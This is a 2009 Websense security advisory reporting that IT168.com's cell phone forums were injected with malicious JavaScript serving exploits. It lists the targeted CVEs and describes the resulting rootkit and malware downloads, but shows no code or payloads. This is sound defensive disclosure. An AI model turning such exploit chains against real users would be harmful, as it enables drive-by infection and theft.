Alerts
The Cell Phone Forums of IT168.com Injection
Date:08.25.2009
Threat Type: Malicious Web Site / Malicious Code
Websense® Security Labs™ ThreatSeeker™ Network has discovered that some well-known cell phone forums at IT168 in China have been injected with malicious JavaScript. The infected forum sites - including forums for Nokia, Motorola, and Sony Ericsson - are serving some exploits that target a number of vulnerabilities in the wild.
IT168.com is one of the largest mainstream IT information platforms in China, providing IT product price and market orientation information. It has a high Alexa rank of 170. The forums on the site, especially the cell phone bulletin boards, are very popular, and unsuspecting visitors to these sites can easily get infected.
Screenshot of bbs.it168.com:
Screenshot of the injected JavaScript:
The payload of the JavaScript:
The attackers capitalize on the results from popular search engines like Google, Baidu, and Sogou to spread malicous codes.
The payload of the iframe above:
The targeting vulnerabilities are:
CVE-2007-0071
CVE-2008-0015
CVE-2009-1136
CVE-2009-1862
MS09-002
MS06-014
Once one of the vulnerabilities is triggered, an executable is downloaded onto the user's machine. This malware installs a rootkit driver and also downloads the main "threat dispatcher". At least 29 malicious applications are downloaded. Some of them install global hooks on the machine, copy themselves inside the Windows folder, and perform other malicious activities. The majority of these executables are packed with UPX, but a few of them use custom executable packers.
Websense Messaging and Websense Web Security customers are protected against this attack.